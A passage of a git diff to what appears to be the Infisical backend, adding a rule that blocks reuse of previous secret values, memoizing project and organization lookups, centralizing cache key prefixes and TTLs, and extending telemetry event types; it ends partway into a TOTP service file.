b/backend/src/services/secret-validation-rule/secret-validation-rule-fns.ts @@ -3,6 +3,7 @@ import RE2 from "re2"; import { BadRequestError } from "@app/lib/errors"; +import { MAX_PREVENT_VALUE_REUSE_VERSIONS } from "./secret-validation-rule-schemas"; import { ConstraintTarget, ConstraintType, @@ -146,6 +147,7 @@ export const checkForOverlappingRules = ({ type TSecretToValidate = { key: string; value?: string; + previousValues?: string[]; }; type TValidationRule = { @@ -168,7 +170,8 @@ const CONSTRAINT_LABELS: Record = { [ConstraintType.MaxLength]: "Maximum length", [ConstraintType.RegexPattern]: "Regex pattern", [ConstraintType.RequiredPrefix]: "Required prefix", - [ConstraintType.RequiredSuffix]: "Required suffix" + [ConstraintType.RequiredSuffix]: "Required suffix", + [ConstraintType.PreventValueReuse]: "Prevent reuse of previous secret values" }; const TARGET_LABELS: Record = { @@ -234,6 +237,17 @@ const evaluateConstraint = (constraint: TConstraint, secret: TSecretToValidate): } return null; } + case ConstraintType.PreventValueReuse: { + if (secret.value === undefined || !secret.previousValues?.length) { + return null; + } + const versionCount = Number(constraint.value) || MAX_PREVENT_VALUE_REUSE_VERSIONS; + const valuesToCheck = secret.previousValues.slice(0, versionCount); + if (valuesToCheck.includes(secret.value)) { + return `${targetLabel} cannot reuse any of the last ${versionCount} values`; + } + return null; + } default: return null; } diff --git a/backend/src/services/secret-validation-rule/secret-validation-rule-schemas.ts b/backend/src/services/secret-validation-rule/secret-validation-rule-schemas.ts index b69d9a843bd..b00d1e3f083 100644 --- a/backend/src/services/secret-validation-rule/secret-validation-rule-schemas.ts +++ b/backend/src/services/secret-validation-rule/secret-validation-rule-schemas.ts @@ -9,11 +9,33 @@ import { TSecretValidationRuleInputs } from "./secret-validation-rule-types"; -export const constraintSchema = z.object({ - type: z.nativeEnum(ConstraintType), - appliesTo: z.nativeEnum(ConstraintTarget), - value: z.string().min(1) -}); +export const MAX_PREVENT_VALUE_REUSE_VERSIONS = 25; + +export const constraintSchema = z + .object({ + type: z.nativeEnum(ConstraintType), + appliesTo: z.nativeEnum(ConstraintTarget), + value: z.string() + }) + .refine((c) => c.type === ConstraintType.PreventValueReuse || c.value.length > 0, { + message: "Value is required", + path: ["value"] + }) + .refine((c) => c.type !== ConstraintType.PreventValueReuse || c.appliesTo === ConstraintTarget.SecretValue, { + message: "No value reuse constraint can only apply to secret values", + path: ["appliesTo"] + }) + .refine( + (c) => { + if (c.type !== ConstraintType.PreventValueReuse) return true; + const num = Number(c.value); + return Number.isInteger(num) && num >= 1 && num <= MAX_PREVENT_VALUE_REUSE_VERSIONS; + }, + { + message: `Prevent value reuse version count must be between 1 and ${MAX_PREVENT_VALUE_REUSE_VERSIONS}`, + path: ["value"] + } + ); export const staticSecretsInputsSchema = z.object({ constraints: z.array(constraintSchema).min(1) diff --git a/backend/src/services/secret-validation-rule/secret-validation-rule-service.ts b/backend/src/services/secret-validation-rule/secret-validation-rule-service.ts index 7f7f96816a7..b7ccc1e8d37 100644 --- a/backend/src/services/secret-validation-rule/secret-validation-rule-service.ts +++ b/backend/src/services/secret-validation-rule/secret-validation-rule-service.ts @@ -1,4 +1,5 @@ import { ForbiddenError } from "@casl/ability"; +import picomatch from "picomatch"; import { ActionProjectType } from "@app/db/schemas"; import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; @@ -11,10 +12,13 @@ import { KmsDataKey } from "../kms/kms-types"; import { TSecretFolderDALFactory } from "../secret-folder/secret-folder-dal"; import { expandSecretReferencesFactory } from "../secret-v2-bridge/secret-reference-fns"; import { TSecretV2BridgeDALFactory } from "../secret-v2-bridge/secret-v2-bridge-dal"; +import { TSecretVersionV2DALFactory } from "../secret-v2-bridge/secret-version-dal"; import { TSecretValidationRuleDALFactory } from "./secret-validation-rule-dal"; import { checkForOverlappingRules, enforceSecretValidationRules } from "./secret-validation-rule-fns"; -import { parseSecretValidationRuleInputs } from "./secret-validation-rule-schemas"; +import { MAX_PREVENT_VALUE_REUSE_VERSIONS, parseSecretValidationRuleInputs } from "./secret-validation-rule-schemas"; import { + ConstraintTarget, + ConstraintType, SecretValidationRuleType, TCreateSecretValidationRuleDTO, TDeleteSecretValidationRuleDTO, @@ -27,6 +31,7 @@ type TSecretValidationRuleServiceFactoryDep = { projectEnvDAL: Pick; folderDAL: Pick; secretDAL: TSecretV2BridgeDALFactory; + secretVersionV2BridgeDAL: Pick; permissionService: Pick; kmsService: TKmsServiceFactory; }; @@ -38,6 +43,7 @@ export const secretValidationRuleServiceFactory = ({ projectEnvDAL, folderDAL, secretDAL, + secretVersionV2BridgeDAL, permissionService, kmsService }: TSecretValidationRuleServiceFactoryDep) => { @@ -321,7 +327,7 @@ export const secretValidationRuleServiceFactory = ({ environment: string; envId: string; secretPath: string; - secrets: { key: string; value?: string }[]; + secrets: { key: string; value?: string; secretId?: string }[]; }) => { if (!secrets.length) return; @@ -341,9 +347,61 @@ export const secretValidationRuleServiceFactory = ({ canExpandValue: () => true }); - let resolvedSecrets = secrets; + const { decryptor: ruleInputsDecryptor } = await kmsService.createCipherPairWithDataKey({ + type: KmsDataKey.SecretManager, + projectId + }); + + const parsedRules = rules.map((r) => ({ + ...r, + inputs: parseSecretValidationRuleInputs( + r.type, + JSON.parse(ruleInputsDecryptor({ cipherTextBlob: r.encryptedInputs }).toString()) as unknown + ) + })); + + // filter to rules that actually match this environment + path so we don't trigger expensive version-history lookups for unrelated PreventValueReuse rules. + const matchingRules = parsedRules.filter((r) => { + if (r.envId && r.envId !== envId) return false; + return picomatch.isMatch(secretPath, r.secretPath, { strictSlashes: false }); + }); - resolvedSecrets = await Promise.all( + const hasPreventValueReuseConstraint = matchingRules.some((r) => + r.inputs.constraints?.some( + (c) => c.type === ConstraintType.PreventValueReuse && c.appliesTo === ConstraintTarget.SecretValue + ) + ); + + const previousValuesMap: Record = {}; + if (hasPreventValueReuseConstraint) { + const secretIdsToCheck = secrets.filter((s) => s.secretId).map((s) => s.secretId!); + if (secretIdsToCheck.length) { + const allVersions = await Promise.all( + secretIdsToCheck.map((sId) => + secretVersionV2BridgeDAL.find( + { secretId: sId }, + { sort: [["version", "desc"]], limit: MAX_PREVENT_VALUE_REUSE_VERSIONS } + ) + ) + ); + + for (const versions of allVersions) { + for (const version of versions) { + if (!version.encryptedValue) { + // eslint-disable-next-line no-continue + continue; + } + const decryptedValue = secretManagerDecryptor({ cipherTextBlob: version.encryptedValue }).toString(); + if (!previousValuesMap[version.secretId]) { + previousValuesMap[version.secretId] = []; + } + previousValuesMap[version.secretId].push(decryptedValue); + } + } + } + } + + const resolvedSecrets = await Promise.all( secrets.map(async (s) => ({ key: s.key, value: await expandSecretReferences({ @@ -351,23 +409,13 @@ export const secretValidationRuleServiceFactory = ({ secretPath, environment, secretKey: s.key - }) + }), + ...(s.secretId && previousValuesMap[s.secretId] ? { previousValues: previousValuesMap[s.secretId] } : {}) })) ); - const { decryptor: ruleInputsDecryptor } = await kmsService.createCipherPairWithDataKey({ - type: KmsDataKey.SecretManager, - projectId - }); - enforceSecretValidationRules({ - projectRules: rules.map((r) => ({ - ...r, - inputs: parseSecretValidationRuleInputs( - r.type, - JSON.parse(ruleInputsDecryptor({ cipherTextBlob: r.encryptedInputs }).toString()) as unknown - ) - })), + projectRules: parsedRules, envId, secretPath, secrets: resolvedSecrets diff --git a/backend/src/services/secret-validation-rule/secret-validation-rule-types.ts b/backend/src/services/secret-validation-rule/secret-validation-rule-types.ts index b71f2df8af9..c41e30b5443 100644 --- a/backend/src/services/secret-validation-rule/secret-validation-rule-types.ts +++ b/backend/src/services/secret-validation-rule/secret-validation-rule-types.ts @@ -9,7 +9,8 @@ export enum ConstraintType { MaxLength = "max-length", RegexPattern = "regex-pattern", RequiredPrefix = "required-prefix", - RequiredSuffix = "required-suffix" + RequiredSuffix = "required-suffix", + PreventValueReuse = "prevent-value-reuse" } export enum ConstraintTarget { diff --git a/backend/src/services/secret/secret-queue.ts b/backend/src/services/secret/secret-queue.ts index 3f5163c76ba..8b6f8aab034 100644 --- a/backend/src/services/secret/secret-queue.ts +++ b/backend/src/services/secret/secret-queue.ts @@ -18,7 +18,6 @@ import { TLicenseServiceFactory } from "@app/ee/services/license/license-service import { TProjectEventsService } from "@app/ee/services/project-events/project-events-service"; import { ProjectEvents, TProjectEventPayload } from "@app/ee/services/project-events/project-events-types"; import { TSecretApprovalRequestDALFactory } from "@app/ee/services/secret-approval-request/secret-approval-request-dal"; -import { TSecretRotationDALFactory } from "@app/ee/services/secret-rotation/secret-rotation-dal"; import { TSnapshotDALFactory } from "@app/ee/services/secret-snapshot/snapshot-dal"; import { TSnapshotSecretV2DALFactory } from "@app/ee/services/secret-snapshot/snapshot-secret-v2-dal"; import { KeyStorePrefixes, KeyStoreTtls, TKeyStoreFactory } from "@app/keystore/keystore"; @@ -113,7 +112,6 @@ type TSecretQueueFactoryDep = { secretV2BridgeDAL: TSecretV2BridgeDALFactory; secretVersionV2BridgeDAL: Pick; secretVersionTagV2BridgeDAL: Pick; - secretRotationDAL: Pick; secretApprovalRequestDAL: Pick; snapshotDAL: Pick; snapshotSecretV2BridgeDAL: Pick; @@ -178,8 +176,8 @@ export const secretQueueFactory = ({ secretVersionV2BridgeDAL, kmsService, secretVersionTagV2BridgeDAL, - secretRotationDAL, snapshotDAL, + snapshotSecretV2BridgeDAL, secretApprovalRequestDAL, keyStore, @@ -1557,17 +1555,6 @@ export const secretQueueFactory = ({ "id", tx ); - /* - * Secret Rotation Secret Migration - * Saving the new encrypted colum - * */ - const projectV1SecretRotations = await secretRotationDAL.find({ projectId }, tx); - await secretRotationDAL.secretOutputV2InsertMany( - projectV1SecretRotations.flatMap((el) => - el.outputs.map((output) => ({ rotationId: el.id, key: output.key, secretId: output.secret.id })) - ), - tx - ); /* * approvals: we will delete all approvals this is because some secret versions may not be added yet diff --git a/backend/src/services/secret/secret-service.ts b/backend/src/services/secret/secret-service.ts index f5a255eb6d6..a8c4580ad73 100644 --- a/backend/src/services/secret/secret-service.ts +++ b/backend/src/services/secret/secret-service.ts @@ -3055,7 +3055,9 @@ export const secretServiceFactory = ({ if (projectSlug) { project = await projectDAL.findProjectBySlug(projectSlug, actorOrgId); } else if (inputProjectId) { - project = await projectDAL.findById(inputProjectId); + project = await requestMemoize(requestMemoKeys.projectFindById(inputProjectId), () => + projectDAL.findById(inputProjectId) + ); } if (!project) { @@ -3592,12 +3594,7 @@ export const secretServiceFactory = ({ throw new NotFoundError({ message: `Secret version with ID '${versionId}' not found` }); } - const project = await projectDAL.findById(version.projectId); - if (!project) { - throw new NotFoundError({ message: `Project with ID '${version.projectId}' not found` }); - } - - const { shouldUseSecretV2Bridge } = await projectBotService.getBotKey(project.id); + const { shouldUseSecretV2Bridge } = await projectBotService.getBotKey(version.projectId); if (!shouldUseSecretV2Bridge) { throw new BadRequestError({ message: "Project version not supported", diff --git a/backend/src/services/service-token/service-token-service.ts b/backend/src/services/service-token/service-token-service.ts index 8f7b0a1b7b2..d99bd0e835a 100644 --- a/backend/src/services/service-token/service-token-service.ts +++ b/backend/src/services/service-token/service-token-service.ts @@ -11,6 +11,8 @@ import { getConfig } from "@app/lib/config/env"; import { crypto } from "@app/lib/crypto/cryptography"; import { ForbiddenRequestError, NotFoundError, UnauthorizedError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { TAccessTokenQueueServiceFactory } from "../access-token-queue/access-token-queue"; import { ActorType } from "../auth/auth-type"; @@ -174,7 +176,9 @@ export const serviceTokenServiceFactory = ({ const serviceToken = await serviceTokenDAL.findById(tokenIdentifier); if (!serviceToken) throw new NotFoundError({ message: `Service token with ID '${tokenIdentifier}' not found` }); - const project = await projectDAL.findById(serviceToken.projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(serviceToken.projectId), () => + projectDAL.findById(serviceToken.projectId) + ); if (!project) throw new NotFoundError({ message: `Project with ID '${serviceToken.projectId}' not found` }); @@ -187,7 +191,9 @@ export const serviceTokenServiceFactory = ({ if (!isMatch) throw new UnauthorizedError({ message: "Invalid service token" }); await accessTokenQueue.updateServiceTokenStatus(serviceToken.id); - const serviceTokenOrgDetails = await orgDAL.findById(project.orgId); + const serviceTokenOrgDetails = await requestMemoize(requestMemoKeys.orgFindById(project.orgId), () => + orgDAL.findById(project.orgId) + ); return { ...serviceToken, diff --git a/backend/src/services/smtp/smtp-service.ts b/backend/src/services/smtp/smtp-service.ts index 3449029836b..cbdc8cde5b6 100644 --- a/backend/src/services/smtp/smtp-service.ts +++ b/backend/src/services/smtp/smtp-service.ts @@ -4,6 +4,7 @@ import SMTPTransport from "nodemailer/lib/smtp-transport"; import React from "react"; import { getConfig } from "@app/lib/config/env"; +import { InternalServerError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; import { @@ -212,3 +213,16 @@ export const smtpServiceFactory = (cfg: TSmtpConfig) => { return { sendMail, verify }; }; + +export const throwIfSmtpError = (err: unknown, logMessage: string) => { + logger.error(err, logMessage); + const { isCloud } = getConfig(); + // We must always throw so the user is not left waiting for an email that never arrives. + // On cloud, we show a generic message to avoid exposing internal misconfiguration details. + throw new InternalServerError({ + message: isCloud + ? "We could not send you an email. Please try again later." + : "Failed to send email. This is likely due to a misconfigured SMTP server. Please check your SMTP settings and try again.", + name: "SmtpError" + }); +}; diff --git a/backend/src/services/super-admin/invalidate-cache-queue.ts b/backend/src/services/super-admin/invalidate-cache-queue.ts index c2a12f5d5ce..0eda4e643b4 100644 --- a/backend/src/services/super-admin/invalidate-cache-queue.ts +++ b/backend/src/services/super-admin/invalidate-cache-queue.ts @@ -1,4 +1,4 @@ -import { TKeyStoreFactory } from "@app/keystore/keystore"; +import { KeyStorePrefixes, KeyStoreTtls, TKeyStoreFactory } from "@app/keystore/keystore"; import { logger } from "@app/lib/logger"; import { QueueJobs, QueueName, TQueueServiceFactory } from "@app/queue"; @@ -31,15 +31,19 @@ export const invalidateCacheQueueFactory = ({ queueService, keyStore }: TInvalid data: { type } } = job.data; - await keyStore.setItemWithExpiry("invalidating-cache", 1800, "true"); // 30 minutes max (in case the job somehow silently fails) + await keyStore.setItemWithExpiry( + KeyStorePrefixes.InvalidatingCache, + KeyStoreTtls.InvalidatingCacheInSeconds, + "true" + ); // 30 minutes max (in case the job somehow silently fails) if (type === CacheType.ALL || type === CacheType.SECRETS) - await keyStore.deleteItems({ pattern: "secret-manager:*" }); + await keyStore.deleteItems({ pattern: KeyStorePrefixes.SecretManagerCachePattern }); - await keyStore.deleteItem("invalidating-cache"); + await keyStore.deleteItem(KeyStorePrefixes.InvalidatingCache); } catch (err) { logger.error(err, "Failed to invalidate cache"); - await keyStore.deleteItem("invalidating-cache"); + await keyStore.deleteItem(KeyStorePrefixes.InvalidatingCache); } }); diff --git a/backend/src/services/super-admin/super-admin-service.ts b/backend/src/services/super-admin/super-admin-service.ts index 63f21e003ab..ffb8920b8e4 100644 --- a/backend/src/services/super-admin/super-admin-service.ts +++ b/backend/src/services/super-admin/super-admin-service.ts @@ -12,7 +12,7 @@ import { import { TEmailDomainDALFactory } from "@app/ee/services/email-domain/email-domain-dal"; import { EmailDomainStatus } from "@app/ee/services/email-domain/email-domain-types"; import { TLicenseServiceFactory } from "@app/ee/services/license/license-service"; -import { PgSqlLock, TKeyStoreFactory } from "@app/keystore/keystore"; +import { KeyStorePrefixes, KeyStoreTtls, PgSqlLock, TKeyStoreFactory } from "@app/keystore/keystore"; import { withCache } from "@app/lib/cache/with-cache"; import { getConfig, @@ -24,6 +24,8 @@ import { import { crypto } from "@app/lib/crypto/cryptography"; import { BadRequestError, NotFoundError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { OrgServiceActor } from "@app/lib/types"; import { isDisposableEmail, sanitizeEmail, validateEmail } from "@app/lib/validator"; import { TAuthTokenServiceFactory } from "@app/services/auth-token/auth-token-service"; @@ -128,8 +130,6 @@ export const getInstanceIntegrationsConfig = () => { return adminIntegrationsConfig; }; -const ADMIN_CONFIG_KEY = "infisical-admin-cfg"; -const ADMIN_CONFIG_KEY_EXP = 60; // 60s export const ADMIN_CONFIG_DB_UUID = "00000000-0000-0000-0000-000000000000"; export const superAdminServiceFactory = ({ @@ -160,8 +160,8 @@ export const superAdminServiceFactory = ({ getServerCfg = async () => { const serverCfg = await withCache({ keyStore, - key: ADMIN_CONFIG_KEY, - ttlSeconds: ADMIN_CONFIG_KEY_EXP, + key: KeyStorePrefixes.AdminConfig, + ttlSeconds: KeyStoreTtls.AdminConfigInSeconds, fetcher: async () => { const cfg = await serverCfgDAL.findById(ADMIN_CONFIG_DB_UUID); if (!cfg) { @@ -181,7 +181,7 @@ export const superAdminServiceFactory = ({ }; // reset on initialized - await keyStore.deleteItem(ADMIN_CONFIG_KEY); + await keyStore.deleteItem(KeyStorePrefixes.AdminConfig); const serverCfg = await serverCfgDAL.transaction(async (tx) => { await tx.raw("SELECT pg_advisory_xact_lock(?)", [PgSqlLock.SuperAdminInit]); const serverCfgInDB = await serverCfgDAL.findById(ADMIN_CONFIG_DB_UUID); @@ -463,9 +463,16 @@ export const superAdminServiceFactory = ({ const updatedServerCfg = await serverCfgDAL.updateById(ADMIN_CONFIG_DB_UUID, updatedData); try { - await keyStore.setItemWithExpiry(ADMIN_CONFIG_KEY, ADMIN_CONFIG_KEY_EXP, JSON.stringify(updatedServerCfg)); + await keyStore.setItemWithExpiry( + KeyStorePrefixes.AdminConfig, + KeyStoreTtls.AdminConfigInSeconds, + JSON.stringify(updatedServerCfg) + ); } catch (err) { - logger.warn({ key: ADMIN_CONFIG_KEY, err }, `updateServerCfg: cache write failed [key=${ADMIN_CONFIG_KEY}]`); + logger.warn( + { key: KeyStorePrefixes.AdminConfig, err }, + `updateServerCfg: cache write failed [key=${KeyStorePrefixes.AdminConfig}]` + ); } if (gitHubAppConnectionSettingsUpdated) { @@ -558,6 +565,7 @@ export const superAdminServiceFactory = ({ if (existingUser) throw new BadRequestError({ name: "Instance initialization", message: "User already exists" }); const userInfo = await userDAL.transaction(async (tx) => { + const hashedPassword = await crypto.hashing().createHash(password, appCfg.SALT_ROUNDS); const newUser = await userDAL.create( { firstName: "Admin", @@ -568,13 +576,12 @@ export const superAdminServiceFactory = ({ isGhost: false, isAccepted: true, authMethods: [AuthMethod.EMAIL], - isEmailVerified: true + isEmailVerified: true, + hashedPassword }, tx ); - const hashedPassword = await crypto.hashing().createHash(password, appCfg.SALT_ROUNDS); - const userEnc = await userDAL.createUserEncryption( { userId: newUser.id, @@ -584,7 +591,7 @@ export const superAdminServiceFactory = ({ tx ); - return { user: newUser, enc: userEnc }; + return { user: { ...newUser, hashedPassword: null }, enc: userEnc }; }); const initialOrganizationName = organizationName ?? "Admin Org"; @@ -977,7 +984,7 @@ export const superAdminServiceFactory = ({ throw new NotFoundError({ message: "Could not find server admin user" }); } - const org = await orgDAL.findById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!org) { throw new NotFoundError({ message: `Could not organization with ID "${orgId}"` }); @@ -1042,7 +1049,9 @@ export const superAdminServiceFactory = ({ throw new BadRequestError({ message: "No invite email associated with user." }); } - const org = await orgDAL.findOrgById(orgMembership.scopeOrgId); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(orgMembership.scopeOrgId), () => + orgDAL.findOrgById(orgMembership.scopeOrgId) + ); const appCfg = getConfig(); const serverAdmin = await userDAL.findById(actor.id); @@ -1161,7 +1170,7 @@ export const superAdminServiceFactory = ({ }; const checkIfInvalidatingCache = async () => { - return (await keyStore.getItem("invalidating-cache")) !== null; + return (await keyStore.getItem(KeyStorePrefixes.InvalidatingCache)) !== null; }; const initializeAdminIntegrationConfigSync = async () => { @@ -1194,7 +1203,7 @@ export const superAdminServiceFactory = ({ }; const createEmailDomain = async ({ orgId, domain }: TAdminCreateEmailDomainDTO) => { - const org = await orgDAL.findOrgById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(orgId), () => orgDAL.findOrgById(orgId)); if (!org) throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` }); const config = getConfig(); diff --git a/backend/src/services/telemetry/telemetry-service.ts b/backend/src/services/telemetry/telemetry-service.ts index 46ff97026f7..f11510fb0f4 100644 --- a/backend/src/services/telemetry/telemetry-service.ts +++ b/backend/src/services/telemetry/telemetry-service.ts @@ -8,7 +8,9 @@ import { getConfig } from "@app/lib/config/env"; import { request } from "@app/lib/config/request"; import { crypto } from "@app/lib/crypto/cryptography"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { ActorType } from "@app/services/auth/auth-type"; import { TOrgDALFactory } from "@app/services/org/org-dal"; @@ -18,8 +20,6 @@ export const TELEMETRY_SECRET_PROCESSED_KEY = "telemetry-secret-processed"; export const TELEMETRY_SECRET_OPERATIONS_KEY = "telemetry-secret-operations"; export const POSTHOG_AGGREGATED_EVENTS = [PostHogEventTypes.SecretPulled, PostHogEventTypes.MachineIdentityLogin]; -const TELEMETRY_AGGREGATED_KEY_EXP = 600; // 10mins -const GROUP_IDENTIFY_CACHE_TTL = 3600; // 1 hour // Bucket configuration const TELEMETRY_BUCKET_COUNT = 30; @@ -60,7 +60,7 @@ const getBucketForDistinctId = (distinctId: string): string => { export const createTelemetryEventKey = (event: string, distinctId: string): string => { const bucketId = getBucketForDistinctId(distinctId); - return `telemetry-event-${event}-${bucketId}-${distinctId}-${crypto.nativeCrypto.randomUUID()}`; + return KeyStorePrefixes.TelemetryEvent(event, bucketId, distinctId, crypto.nativeCrypto.randomUUID()); }; export enum DeploymentType { @@ -74,17 +74,17 @@ export enum DeploymentType { * Computes the deployment type based on the instance type and environment configuration. * - US Cloud: instanceType is Cloud and INTERNAL_REGION is "us" (or unset, defaults to US) * - EU Cloud: instanceType is Cloud and INTERNAL_REGION is "eu" - * - Dedicated: INFISICAL_CLOUD is true but instanceType is not Cloud (uses self-hosted license keys) + * - Dedicated: INFISICAL_DEDICATED is true * - Self-Hosted: everything else */ const getDeploymentType = ( instanceType: InstanceType, - appConfig: { INFISICAL_CLOUD: boolean; INTERNAL_REGION?: string } + appConfig: { INFISICAL_CLOUD: boolean; INFISICAL_DEDICATED: boolean; INTERNAL_REGION?: string } ) => { if (instanceType === InstanceType.Cloud) { return appConfig.INTERNAL_REGION === "eu" ? DeploymentType.EUCloud : DeploymentType.USCloud; } - if (appConfig.INFISICAL_CLOUD) { + if (appConfig.INFISICAL_DEDICATED) { return DeploymentType.Dedicated; } return DeploymentType.SelfHosted; @@ -135,7 +135,8 @@ To opt into telemetry, you can set "TELEMETRY_ENABLED=true" within the environme email: string, signupMethod: HubSpotSignupMethod, firstName?: string, - lastName?: string + lastName?: string, + hubspotUtk?: string ) => { const instanceType = licenseService.getInstanceType(); if ( @@ -159,14 +160,22 @@ To opt into telemetry, you can set "TELEMETRY_ENABLED=true" within the environme if (value) fields.push({ name, value }); } + const context: Record = { + pageUri: `${appCfg.SITE_URL || "https://app.infisical.com"}/signup`, + pageName: "App Signup" + }; + + // Include the HubSpot tracking cookie to link this submission + // to the visitor's browsing session for proper attribution + if (hubspotUtk) { + context.hutk = hubspotUtk; + } + await request.post( `https://api.hsforms.com/submissions/v3/integration/submit/${appCfg.HUBSPOT_PORTAL_ID}/${appCfg.HUBSPOT_SIGNUP_FORM_ID}`, { fields, - context: { - pageUri: `${appCfg.SITE_URL || "https://app.infisical.com"}/signup`, - pageName: "App Signup" - } + context }, { headers: { @@ -195,7 +204,7 @@ To opt into telemetry, you can set "TELEMETRY_ENABLED=true" within the environme } try { - const org = await orgDAL.findOrgById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(orgId), () => orgDAL.findOrgById(orgId)); if (org) { if (!properties.name) { properties.name = org.name; @@ -248,7 +257,7 @@ To opt into telemetry, you can set "TELEMETRY_ENABLED=true" within the environme const eventKey = createTelemetryEventKey(event.event, event.distinctId); await keyStore.setItemWithExpiry( eventKey, - TELEMETRY_AGGREGATED_KEY_EXP, + KeyStoreTtls.TelemetryAggregatedEventInSeconds, JSON.stringify({ distinctId: event.distinctId, event: event.event, @@ -263,7 +272,7 @@ To opt into telemetry, you can set "TELEMETRY_ENABLED=true" within the environme // Dedup groupIdentify: only fire once per org per hour to avoid redundant DB/API calls const groupIdentifyCacheKey = KeyStorePrefixes.TelemetryGroupIdentify(orgId); void keyStore - .setItemWithExpiryNX(groupIdentifyCacheKey, GROUP_IDENTIFY_CACHE_TTL, "1") + .setItemWithExpiryNX(groupIdentifyCacheKey, KeyStoreTtls.TelemetryGroupIdentifyInSeconds, "1") .then((wasSet) => { if (wasSet) { return getOrgGroupProperties(orgId, resolvedOrgName).then((groupProperties) => { @@ -362,7 +371,7 @@ To opt into telemetry, you can set "TELEMETRY_ENABLED=true" within the environme if (!postHog) return 0; try { - const bucketPattern = `telemetry-event-${eventType}-${bucketId}-*`; + const bucketPattern = KeyStorePrefixes.TelemetryEventByBucketPattern(eventType, bucketId); const bucketKeys = await keyStore.getKeysByPattern(bucketPattern); if (bucketKeys.length === 0) return 0; @@ -402,7 +411,11 @@ To opt into telemetry, you can set "TELEMETRY_ENABLED=true" within the environme // Dedup groupIdentify across all paths: only fire once per org per hour const groupIdentifyCacheKey = KeyStorePrefixes.TelemetryGroupIdentify(key.org); // eslint-disable-next-line no-await-in-loop - const wasSet = await keyStore.setItemWithExpiryNX(groupIdentifyCacheKey, GROUP_IDENTIFY_CACHE_TTL, "1"); + const wasSet = await keyStore.setItemWithExpiryNX( + groupIdentifyCacheKey, + KeyStoreTtls.TelemetryGroupIdentifyInSeconds, + "1" + ); if (wasSet) { let groupProperties = orgPropertiesCache.get(key.org); if (!groupProperties) { @@ -466,8 +479,6 @@ To opt into telemetry, you can set "TELEMETRY_ENABLED=true" within the environme } }; - const TELEMETRY_IDENTIFY_CACHE_KEY_PREFIX = "telemetry-identify"; - const TELEMETRY_IDENTIFY_CACHE_TTL = 86400; // 24 hours // Shorter TTL for in-memory fallback to bound memory growth during Redis outages const IN_MEMORY_IDENTIFY_FALLBACK_TTL_MS = 5 * 60 * 1000; // 5 minutes @@ -491,9 +502,13 @@ To opt into telemetry, you can set "TELEMETRY_ENABLED=true" within the environme if (postHog && distinctId) { if (!skipDedup) { try { - const cacheKey = `${TELEMETRY_IDENTIFY_CACHE_KEY_PREFIX}:${distinctId}`; + const cacheKey = KeyStorePrefixes.TelemetryIdentify(distinctId); // Atomic SET NX + EX: only the first caller within the TTL window proceeds - const wasSet = await keyStore.setItemWithExpiryNX(cacheKey, TELEMETRY_IDENTIFY_CACHE_TTL, "1"); + const wasSet = await keyStore.setItemWithExpiryNX( + cacheKey, + KeyStoreTtls.TelemetryIdentifyIdentityInSeconds, + "1" + ); if (!wasSet) return; } catch (error) { logger.error(error, `Failed to check PostHog identify dedup cache for distinctId=${distinctId}`); diff --git a/backend/src/services/telemetry/telemetry-types.ts b/backend/src/services/telemetry/telemetry-types.ts index 9a72395185b..5f870c8d314 100644 --- a/backend/src/services/telemetry/telemetry-types.ts +++ b/backend/src/services/telemetry/telemetry-types.ts @@ -3,6 +3,7 @@ import { AcmeAccountActor, AcmeProfileActor, EstAccountActor, + GatewayActor, IdentityActor, KmipClientActor, PlatformActor, @@ -12,6 +13,7 @@ import { UnknownUserActor, UserActor } from "@app/ee/services/audit-log/audit-log-types"; +import { PamParentType } from "@app/ee/services/pam-account/pam-account-enums"; import { SecretRotation } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-enums"; import { EnforcementLevel, SecretSharingAccessType } from "@app/lib/types"; import { AppConnection } from "@app/services/app-connection/app-connection-enums"; @@ -28,6 +30,7 @@ export enum PostHogEventTypes { SecretDeleted = "secrets deleted", AdminInit = "admin initialization", UserSignedUp = "User Signed Up", + UserLoginV2 = "User Login V2", SecretRotated = "secrets rotated", SecretScannerFull = "historical cloud secret scan", SecretScannerPush = "cloud secret scan", @@ -132,7 +135,8 @@ export type TSecretModifiedEvent = { | AcmeProfileActor | KmipClientActor | EstAccountActor - | ScepAccountActor; + | ScepAccountActor + | GatewayActor; }; }; @@ -155,6 +159,14 @@ export type TUserSignedUpEvent = { }; }; +export type TUserLoginV2Event = { + event: PostHogEventTypes.UserLoginV2; + properties: { + email: string; + channel: string; + }; +}; + export type TSecretScannerEvent = { event: PostHogEventTypes.SecretScannerFull | PostHogEventTypes.SecretScannerPush; properties: { @@ -737,7 +749,7 @@ export type TPamResourceEvent = { export type TPamAccountEvent = { event: PostHogEventTypes.PamAccountCreated | PostHogEventTypes.PamAccountDeleted; properties: { - resourceType: string; + parentType: PamParentType; projectId: string; }; }; @@ -754,7 +766,7 @@ export type TPamAccountAccessedEvent = { export type TPamAccountRotatedEvent = { event: PostHogEventTypes.PamAccountRotated; properties: { - resourceType: string; + parentType: PamParentType; projectId: string; }; }; @@ -814,6 +826,7 @@ export type TPostHogEvent = { distinctId: string; organizationId?: string; organ | TSecretModifiedEvent | TAdminInitEvent | TUserSignedUpEvent + | TUserLoginV2Event | TSecretScannerEvent | TUserOrgInvitedEvent | TMachineIdentityCreatedEvent diff --git a/backend/src/services/totp/totp-service.ts b/backend/src/services/totp/totp-service.ts index 193a27d90db..8af265a9ba6 100644 --- a/backend/src/services/totp/totp-service.ts +++ b/backend/src/services/totp/totp-service.ts @@ -1,5 +1,6 @@ import { authenticator } from "otplib"; +import { 